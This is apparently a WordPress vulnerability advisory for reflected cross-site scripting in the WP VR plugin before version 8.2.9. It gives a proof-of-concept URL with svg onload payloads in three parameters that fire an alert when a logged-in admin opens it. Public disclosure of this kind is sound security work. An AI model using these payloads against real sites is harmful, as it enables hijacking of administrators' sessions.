WordPress Plugin Vulnerabilities

WP VR < 8.2.9 - Reflected XSS

Description

The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the below URL:

https://example.com/wp-admin/post-new.php?post_type=wpvr_item&active_tab="><svg/onload=alert(/XSS-active_tab/)>&scene="><svg/onload=alert(/XSS-scene/)>&hotspot="><svg/onload=alert(/XSS-hotspot/)>

Affects Plugins

Fixed in 8.2.9

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Erwan LR (WPScan)
Verified
Yes

Timeline

Publicly Published
2023-03-22 (about 1 years ago)
Added
2023-03-22 (about 1 years ago)
Last Updated
2023-03-22 (about 1 years ago)

Other